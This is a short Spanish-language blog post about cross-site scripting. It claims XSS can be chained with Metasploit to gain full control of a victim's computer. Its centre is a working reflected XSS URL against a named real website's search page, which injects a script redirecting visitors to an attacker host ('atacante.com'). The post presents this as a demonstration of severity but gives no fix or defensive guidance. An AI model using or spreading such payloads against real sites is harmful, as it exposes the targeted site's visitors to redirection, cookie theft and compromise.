por que tanto Xss o Cross Site Scripting??

Son muchas las cosas que puede hacer con un Xss, desde obtener una cookie, infectar, redireccionar a una web maliciosa, etc.

Pero hay algo mas que se puede hacer, como en este caso poder tener acceso al equipo de la victima y tener un control total de ella.

Esto es muy sencillo con el simple uso de Metasploit, en este caso no voy a dar mas explicaciones de como hacer esto, ya que es algo sencillo:

Simplemente ingresando un codigo a la url:

http://www.ifai.org.mx/buscador_ifai/buscar.do?type=all&spell=true&lemmatize=true&fuentes=4&queryStr=<script>document.location=”http://www.atacante.com”</script>

 

Mas que nada esto es  para poder mostrar la gravedad de esta “simple falla”.

Esto principalmente afecta a los clientes de dicha web.

Advertisement
  1. Aún no hay trackbacks

Deja un comentario

Fill in your details below or click an icon to log in:

Logo de WordPress.com

You are commenting using your WordPress.com account. Log Out / Cambiar )

Twitter picture

You are commenting using your Twitter account. Log Out / Cambiar )

Facebook photo

You are commenting using your Facebook account. Log Out / Cambiar )

Connecting to %s

Seguir

Get every new post delivered to your Inbox.